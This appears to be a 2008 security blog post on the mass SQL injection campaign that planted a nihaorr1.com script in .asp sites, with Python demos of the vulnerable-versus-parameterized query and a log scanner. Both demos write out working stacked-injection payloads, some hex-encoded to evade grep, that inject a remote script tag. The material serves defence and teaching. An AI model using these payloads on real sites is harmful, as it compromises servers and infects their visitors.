April 28th, 2008
We’ve been following this one for a few days now and have collected a few relevant sites, which will hopefully reduce the time you have to spend researching it.
From washingtonpost.com “Hundreds of thousands of Web sites – including several at the United Nations and in the U.K. government — have been hacked recently and seeded with code that tries to exploit security flaws in Microsoft Windows to install malicious software on visitors’ machines.”
This is a SQL injection attack aimed primarily at .asp pages. There are two fronts to this battle: the user’s machine (the risk of visiting an already infected site) and the web server (the risk of being injected and then used to serve malware and attacks to its visitors).
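To make the server-side front concrete, here is the mistake behind this kind of attack and its fix, as an added example that is not code from the original post: a classic-ASP-style product lookup rebuilt in Python on an in-memory SQLite database so it runs offline. The products table, its rows and the script host attacker.example are constructed for the example (attacker.example is a placeholder, not an indicator), and ADO’s habit of running every statement in the string it is handed is emulated by splitting the batch and running the statements one by one.

```python
"""Added example, not code from the original post: the string-concatenation
mistake behind this attack and its parameterized fix, rebuilt in Python on an
in-memory SQLite database.

Everything here is constructed: the products table, its rows, and the
placeholder script host attacker.example (not a real indicator).
"""
import sqlite3

# What the injected statement writes into stored content; a page that later
# renders the column hands this tag to every visitor.
INJECTED_TAG = '<script src="http://attacker.example/1.js"></script>'


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, description TEXT);
        INSERT INTO products VALUES (1, 'Widget', 'A fine widget');
        INSERT INTO products VALUES (2, 'Gadget', 'A fine gadget');
    """)
    return conn


def run_batch(conn, sql):
    """Stand-in for the database executing a batch: classic ASP hands the whole
    string to ADO and SQL Server runs every statement in it. sqlite3.execute()
    refuses stacked statements, so they are split on ';' and run one by one
    (good enough here because no literal contains a semicolon).
    Rows from the last statement are returned."""
    rows = []
    for stmt in (s.strip() for s in sql.split(";")):
        if stmt:
            rows = conn.execute(stmt).fetchall()
    return rows


def lookup_vulnerable(conn, product_id):
    """The bug: Request.QueryString("id") pasted straight into the SQL text."""
    sql = "SELECT name, description FROM products WHERE id = " + product_id
    return run_batch(conn, sql)


def lookup_safe(conn, product_id):
    """The fix: the value is bound to a placeholder and is never part of the
    SQL text (ADODB.Command with CreateParameter is the classic-ASP equivalent)."""
    return conn.execute(
        "SELECT name, description FROM products WHERE id = ?", (product_id,)
    ).fetchall()


def descriptions(conn):
    return [d for (d,) in conn.execute("SELECT description FROM products ORDER BY id")]


# Stacked injection: close the SELECT, run an UPDATE that appends the tag to
# every row, then comment out whatever followed the parameter in the page's
# query. ('||' is SQLite's string concatenation; SQL Server uses '+'.)
PAYLOAD = "1; UPDATE products SET description = description || '" + INJECTED_TAG + "' --"


def demo():
    """Run the same payload through both lookups and report what happened."""
    conn = make_db()
    safe_rows = lookup_safe(conn, PAYLOAD)          # bound as text: no row has that id
    clean = all(INJECTED_TAG not in d for d in descriptions(conn))
    lookup_vulnerable(conn, PAYLOAD)                # the UPDATE actually runs
    poisoned = sum(INJECTED_TAG in d for d in descriptions(conn))
    return {"safe_rows": safe_rows, "clean_after_safe": clean, "poisoned_rows": poisoned}


if __name__ == "__main__":
    print(demo())
```

The parameterized lookup treats the whole payload as one opaque value, so nothing is updated and no row matches; the concatenated version runs the attacker’s UPDATE and every product description now carries the script tag, which is exactly how a site ends up “seeded” with code for its visitors. Checking that the id is an integer before it goes anywhere near the database is a cheap extra layer, but binding the parameter is the fix; in ASP.NET the same idea is SqlCommand with SqlParameter rather than string concatenation.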
This shouldn’t really be a surprise to anyone. We’ve been warned for a while now that web attacks were on the rise and that badly written code would be increasingly compromised, so here you have it.
The tough part is that we can’t just patch an OS and make this go away. It takes a skilled programmer to fix these vulnerabilities, which most organizations don’t even know they have, because most places don’t do much in the way of web application scanning. I have a feeling many more will be learning about this the hard way in the coming days and months.
My recommendations for an organization to start dealing with web app vulnerabilities?
1. Get off the IE habit wherever possible AND properly lock down Firefox.
2. Get your web dev staff to training from SANS on mitigating the OWASP top ten.
3. Hound the vendors of any .asp web apps you have purchased and are running, and make them check their code.
4. Check the OWASP site for web scan recommendations. This needs to be part of any org’s vulnerability assessment and ongoing review programs.
The best place in my opinion to start is with the owasp.net website.
Exploit details from SANS:
For end users/support staff:
1. A properly patched system should not be at risk from this attack. By properly patched we mean updating not just the OS but applications like RealPlayer and iTunes as well, since the injected script goes after client-side flaws, not just Windows itself.
A good article on securing your browser:
For web programmers: defending yourself from SQL injection attacks:
Microsoft’s guidelines on protecting ASP.NET from SQL injection.
Also, anyone running SQL-backed web services should review their logs for any reference to www<.>nihaorr1<.>com, the host serving the injected “1.js” script.
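One way to do that log review, as an added example that is not part of the original post or of SANS’s advice: a Python scan over web-server log lines for the indicator above. The log lines, the table and column names inside the sample payload, and the request format are all constructed for the example. The point it adds is that a literal search is not enough: an injected payload normally arrives URL-encoded, and it is often carried as a hex string literal (0x…) that SQL Server unpacks with CAST, as UTF-16LE text when cast to NVARCHAR, so each line is also checked in those decoded forms.

```python
"""Added example, not part of the original post: a scan for the SANS indicator
(www.nihaorr1.com serving 1.js) over web-server log lines, checking each line
in its URL-decoded form and with any hex string literal unpacked.

The log lines and the payload's table/column names are constructed.
"""
import re
from urllib.parse import quote, unquote_plus

# Indicators from the SANS note. "nihaorr1.com" is specific; "/1.js" on its
# own is weak and only worth flagging for review, not alerting on.
INDICATORS = ("nihaorr1.com", "/1.js")

HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")

# Constructed payload: appends the remote script tag to a stored text column,
# which is how visiting a "seeded" page ends up loading the attacker's script.
PAYLOAD_SQL = ("UPDATE products SET description=description"
               "+'<script src=http://www.nihaorr1.com/1.js></script>'")

# Constructed W3C-style log lines: date time method uri-stem uri-query status.
SAMPLE_LOG = [
    "2008-04-26 10:01:02 GET /products.asp id=1 200",
    # plain, URL-encoded payload: the domain is still visible as-is
    "2008-04-26 10:01:09 GET /products.asp id=1;" + quote(PAYLOAD_SQL) + "-- 200",
    # same payload smuggled as an 8-bit hex literal
    "2008-04-26 10:02:15 GET /products.asp id=1;EXEC(CAST(0x"
    + PAYLOAD_SQL.encode("ascii").hex() + "%20AS%20VARCHAR(4000)))-- 200",
    # same payload as a UTF-16LE hex literal (what an NVARCHAR cast expects)
    "2008-04-26 10:03:31 GET /products.asp id=1;EXEC(CAST(0x"
    + PAYLOAD_SQL.encode("utf-16-le").hex() + "%20AS%20NVARCHAR(4000)))-- 200",
    "2008-04-26 10:05:44 GET /site/js/main1.js - 200",
    "2008-04-26 10:09:00 GET /1.js - 200",
]


def decoded_views(line):
    """The raw line, its URL-decoded form, and the contents of every hex
    string literal in it decoded both as 8-bit text and as UTF-16LE."""
    decoded = unquote_plus(line)
    views = [line, decoded]
    for m in HEX_LITERAL.finditer(decoded):
        try:
            raw = bytes.fromhex(m.group(1))
        except ValueError:          # odd-length run, not a byte string
            continue
        views.append(raw.decode("latin-1"))
        views.append(raw.decode("utf-16-le", errors="ignore"))
    return views


def scan(lines):
    """Return (line number, indicator) for every line that references an
    indicator in any of its decoded views; each line is reported once."""
    hits = []
    for number, line in enumerate(lines, 1):
        for view in decoded_views(line):
            text = view.lower()
            hit = next((i for i in INDICATORS if i in text), None)
            if hit:
                hits.append((number, hit))
                break
    return hits


if __name__ == "__main__":
    for number, indicator in scan(SAMPLE_LOG):
        print(f"line {number}: {indicator}")
```

Lines 3 and 4 contain no readable trace of the domain at all, so a grep for the indicator would miss them; only unpacking the hex literal exposes the payload. Line 5 is not reported because “main1.js” does not contain the path form “/1.js”, while line 6 is reported on the weak indicator only, which is the kind of hit to review by hand rather than act on. The same decoding is worth applying to the query strings of every request against an .asp page, not just lines that already mention the host, since a successful injection only needs one request.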